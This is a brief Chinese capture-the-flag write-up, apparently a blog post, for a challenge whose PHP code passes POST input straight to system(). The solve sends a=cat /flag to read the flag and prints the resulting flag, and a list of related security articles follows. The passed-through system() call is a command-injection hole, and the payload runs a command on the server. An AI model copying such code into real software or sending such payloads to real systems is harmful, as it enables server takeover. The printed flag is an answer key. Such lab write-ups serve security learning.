开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
2401_857439692 小时前
SSM 架构下 Vue 电脑测评系统:为电脑性能评估赋能独行soc3 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)Clockwiseee5 小时前
php伪协议xcLeigh6 小时前
网络安全 | 防火墙的工作原理及配置指南安全小王子8 小时前
Kali操作系统简单介绍光路科技8 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险Smile灬凉城6668 小时前
反序列化为啥可以利用加号绕过php正则匹配星河梦瑾8 小时前
SpringBoot相关漏洞学习资料Lspecialnx_10 小时前
文件解析漏洞中间件(iis和Apache)奥顺10 小时前
PHPUnit使用指南:编写高效的单元测试